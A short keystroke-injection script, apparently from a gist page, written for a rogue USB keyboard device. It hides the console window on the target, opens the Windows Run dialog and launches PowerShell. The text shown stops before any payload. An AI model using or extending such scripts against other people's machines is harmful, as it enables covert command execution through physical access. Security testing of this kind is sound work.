This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
layout('us') //set layout us | |
hide=true; // set to true to hide the console window on the target | |
tree=true; | |
typingSpeed(0,0); | |
waitLED(ANY_OR_NONE, 5000); | |
press("GUI r") // windows + r | |
delay(500) | |
type("powershell\n") // write powershell and press "enter" | |
delay(500) |
NewerOlder